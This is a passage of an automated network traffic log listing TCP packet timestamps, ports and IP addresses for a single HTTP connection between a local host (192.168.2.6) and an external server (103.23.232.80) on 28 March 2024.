                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865134954 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865179062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865226030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865226984 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865268946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865286112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865336895 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865405083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865446091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865452051 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865488052 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865519047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865556002 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865562916 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865597010 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865608931 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865653038 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865657091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865720987 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865730047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865757942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865776062 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865808010 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865822077 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865879059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865884066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865947008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865957975 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.865995884 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866025925 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866086006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866090059 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866122007 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866126060 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866163015 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866172075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866205931 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866224051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866260052 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866278887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866317034 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866333961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866372108 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866374016 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866409063 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866426945 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866462946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866466999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866499901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866517067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866553068 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866591930 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866632938 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866636992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866669893 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866679907 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866715908 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866725922 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866760015 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866770983 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866806984 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866811991 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866844893 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866909981 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.866949081 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867038012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867074966 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867105007 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867141008 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867206097 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867237091 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867254972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867290020 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867309093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867347956 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867367029 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867400885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867420912 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867460966 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867470026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867515087 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867543936 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867577076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867588043 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867619038 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867773056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867816925 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867858887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867899895 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867929935 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867965937 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.867974043 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868005991 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868022919 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868047953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868066072 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868088007 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868118048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868159056 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868180037 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868225098 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868238926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868278980 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868282080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868324995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868326902 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868359089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868369102 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868393898 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868442059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868465900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868484020 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868530035 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868560076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868592024 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868596077 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868630886 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868668079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868709087 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868766069 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868805885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868835926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868877888 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868942976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868979931 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.868994951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869036913 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869052887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869090080 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869155884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869199038 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869227886 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869267941 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869297028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869379044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869417906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869447947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869488955 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869520903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869563103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869564056 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869604111 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869606972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869653940 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869668961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869709969 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869716883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869760036 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869792938 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869832039 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869867086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869899035 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869904995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869937897 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.869982958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870023966 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870042086 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870080948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870085001 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870130062 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870140076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870174885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870187044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870229959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870265961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870301008 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870331049 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870373011 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870377064 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870434046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870450974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870496035 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870527983 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870574951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870611906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870624065 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870719910 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870798111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870840073 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870898008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870903969 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870956898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.870982885 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871000051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871006966 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871037960 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871052027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871092081 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871093988 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871136904 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871143103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871197939 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871237040 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871305943 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871388912 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871433020 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871464014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871495962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871512890 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871536970 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871566057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871607065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871608019 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871649027 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871666908 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871700048 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871710062 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871740103 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871757984 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871793985 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871824026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871838093 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871860981 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871881962 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871900082 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871958017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871992111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.871994972 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872033119 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872061014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872104883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872129917 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872153997 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872160912 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872199059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872236013 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872253895 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872288942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872292042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872328997 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872363091 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872406006 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872416019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872454882 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872457981 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872490883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872498989 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872530937 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872601986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872648954 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872670889 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872711897 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872720003 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872761965 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872859955 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872903109 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872934103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.872973919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873006105 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873070002 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873110056 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873117924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873157024 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873187065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873224974 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873229027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873281002 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873297930 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873339891 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873343945 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873395920 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873402119 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873440981 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873445988 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873486042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873488903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873528004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873600006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873640060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873754978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873792887 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:18.873842001 CET8049718103.23.232.80192.168.2.6
